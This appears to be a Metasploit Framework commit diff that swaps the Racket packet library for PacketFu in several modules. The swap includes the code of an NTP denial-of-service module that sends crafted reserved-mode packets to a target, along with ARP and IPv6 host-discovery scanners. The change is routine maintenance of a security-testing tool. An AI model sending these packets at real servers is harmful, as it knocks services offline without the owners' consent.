Fixes #5038, missed a couple mentions of Racket. Excised now for sure.

git-svn-id: file:///home/svn/framework3/trunk@13371 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/exploit/capture.rb

@@ -166,7 +166,7 @@ module Exploit::Capture
 		if not pcap
 			raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)"
 		else
-			pcap.inject(pkt)
+			pcap.inject(pkt.to_s) # Can be a PacketFu Packet object or a pre-packed string
 		end
 	end
 

modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb

@@ -10,8 +10,6 @@
 ##
 
 require 'msf/core'
-require 'racket'
-
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -57,25 +55,16 @@ class Metasploit3 < Msf::Auxiliary
 
 		open_pcap
 
-		n = Racket::Racket.new
+		p = PacketFu::UDPPacket.new
+		p.ip_saddr = datastore['LHOST']
+		p.ip_daddr = ip
+		p.ip_ttl = 255
+		p.udp_src = 123
+		p.udp_dst = 123
+		p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]
+		p.recalc
+		capture_sendto(p,ip)
 
-		n.l3 = Racket::L3::IPv4.new
-		n.l3.src_ip = datastore['LHOST']
-		n.l3.dst_ip = ip
-		n.l3.protocol = 17
-		n.l3.id = rand(0xffff)+1
-		n.l3.ttl = 255
-
-		n.l4 = Racket::L4::UDP.new
-		n.l4.src_port = 123
-		n.l4.dst_port = 123
-		n.l4.payload  = ["\x17","\x97\x00\x00\x00"][rand(2)]
-
-		n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
-
-		buff = n.pack
-
-		capture_sendto(buff, ip)
 		close_pcap
 	end
 

modules/auxiliary/scanner/discovery/arp_sweep.rb

@@ -67,24 +67,23 @@ class Metasploit3 < Msf::Auxiliary
 		hosts.each do |dhost|
 			if dhost != shost
 				probe = buildprobe(shost, smac, dhost)
-				capture.inject(probe)
+				inject(probe)
 
 				while(reply = getreply())
-					next if not reply[:arp]
-					print_status("#{reply[:arp].spa} appears to be up.")
-
-					report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
+					next unless reply.is_arp?
+					print_status("#{reply.arp_saddr_ip} appears to be up.")
+					report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac)
 				end
+
 			end
 		end
 
 		etime = Time.now.to_f + datastore['TIMEOUT']
 		while (Time.now.to_f < etime)
 			while(reply = getreply())
-				next if not reply[:arp]
-				print_status("#{reply[:arp].spa} appears to be up.")
-
-				report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
+				next unless reply.is_arp?
+				print_status("#{reply.arp_saddr_ip} appears to be up.")
+				report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac)
 			end
 			Kernel.select(nil, nil, nil, 0.50)
 		end
@@ -95,31 +94,26 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def buildprobe(shost, smac, dhost)
-		n = Racket::Racket.new
-		n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14))
-		n.l2.src_mac = smac
-		n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff'
-		n.l2.ethertype = 0x0806
-
-		n.l3 = Racket::L3::ARP.new
-		n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST
-		n.l3.sha = n.l2.src_mac
-		n.l3.tha = n.l2.dst_mac
-		n.l3.spa = shost
-		n.l3.tpa = dhost
-		n.pack
+		p = PacketFu::ARPPacket.new
+		p.eth_saddr = smac
+		p.eth_daddr = "ff:ff:ff:ff:ff:ff"
+		p.arp_opcode = 1
+		p.arp_saddr_mac = p.eth_saddr
+		p.arp_daddr_mac = p.eth_daddr
+		p.arp_saddr_ip = shost
+		p.arp_daddr_ip = dhost
+		p.recalc
+		p
 	end
 
 	def getreply
-		pkt = capture.next
-		return if not pkt
-
-		eth = Racket::L2::Ethernet.new(pkt)
-		return if not eth.ethertype == 0x0806
-
-		arp = Racket::L3::ARP.new(eth.payload)
-		return if not arp.opcode == Racket::L3::ARP::ARPOP_REPLY
-
-		{:raw => pkt, :eth => eth, :arp => arp}
+		pkt_bytes = capture.next
+		Kernel.select(nil,nil,nil,0.1)
+		return unless pkt_bytes
+		pkt = PacketFu::Packet.parse(pkt_bytes)
+		return unless pkt.is_arp?
+		return unless pkt.arp_opcode == 2
+		pkt
 	end
+
 end

modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb

@@ -36,34 +36,30 @@ class Metasploit3 < Msf::Auxiliary
 		max_epoch = ::Time.now.to_i + timeout
 
 		while(::Time.now.to_i < max_epoch)
-			pkt = capture.next()
+			pkt_bytes = capture.next()
 			Kernel.select(nil,nil,nil,0.1)
-			next if not pkt
-			eth = Racket::L2::Ethernet.new(pkt)
-
-			next if not eth.ethertype.eql?(Racket::L2::Ethernet::ETHERTYPE_IPV6)
-			ipv6 = Racket::L3::IPv6.new(eth.payload)
-
-			next if not ipv6.nhead == 0x3a
-			icmpv6 = Racket::L4::ICMPv6.new(ipv6.payload)
-
-			next if not icmpv6.type == Racket::L4::ICMPv6Generic::ICMPv6_TYPE_ECHO_REPLY
-
-			icmpv6 = Racket::L4::ICMPv6EchoReply.new(ipv6.payload)
-			host_addr = Racket::L3::Misc.long2ipv6(ipv6.src_ip)
-			host_mac = eth.src_mac
-
-			if(!hosts[host_addr].eql?(host_mac))
+			next if not pkt_bytes
+			p = PacketFu::Packet.parse(pkt_bytes)
+			# Don't bother checking if it's an echo reply, since Neighbor Solicitations
+			# and any other response is just as good.
+			next unless p.is_ipv6? 
+			host_addr = p.ipv6_saddr
+			host_mac = p.eth_saddr
+			next if host_mac == smac
+			unless hosts[host_addr] == host_mac
 				hosts[host_addr] = host_mac
 				print_status("   |*| #{host_addr} => #{host_mac}")
-				# report_host(:mac => host_mac, :host => host_addr)
 			end
 		end
-		return(hosts)
+		return hosts
+	end
+
+	def smac
+		datastore['SMAC'].to_s.empty? ? ipv6_mac : datastore['SMAC']
 	end
 
 	def run
-		# Start caputre
+		# Start capture
 		open_pcap({'FILTER' => "icmp6"})
 
 		# Send ping

modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb

@@ -11,7 +11,6 @@
 
 
 require 'msf/core'
-require 'racket'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb

@@ -10,7 +10,6 @@
 ##
 
 require 'msf/core'
-require 'racket'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking